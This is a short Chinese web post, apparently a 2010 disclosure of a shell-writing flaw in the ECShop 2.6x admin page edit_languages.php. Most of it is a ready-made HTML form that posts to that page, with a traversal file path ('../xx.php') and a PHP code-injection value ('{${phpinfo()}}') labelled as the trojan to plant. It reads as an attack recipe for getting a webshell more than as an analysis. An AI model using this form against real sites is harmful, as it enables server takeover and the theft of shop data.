ecshop 2.6x后台写shell 0day

发布日期:2010-12.28
发布作者:xhm1n9

影响版本:Ecshop 2.6x
官方网站:http://www.ecshop.com

漏洞类型:设计错误

漏洞描述:相办变量未进行过滤,导致提交数据写入shell漏洞。

adminedit_languages.php


测试方法

<title>ecshop 2.6 后台拿shell by:xhm1n9</title>
<form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post">
文件:<input type="text" name="file_path" size="36" value="../xx.php" /><br>任意php文件
关键字: <input type="text" name="item" size="32" value="" /><br>选定文件里的内容
注入语句:<input type="text" name="item_content[]" size="30" value="{${phpinfo()}}" /><br>要替换的马
<input type="hidden" name="item_id" size="30" value="0" /><br>
<input type="submit" value=" 搜索 " class="button" /> <input type="hidden" name="act" value="edit" />
</form>

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/384/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code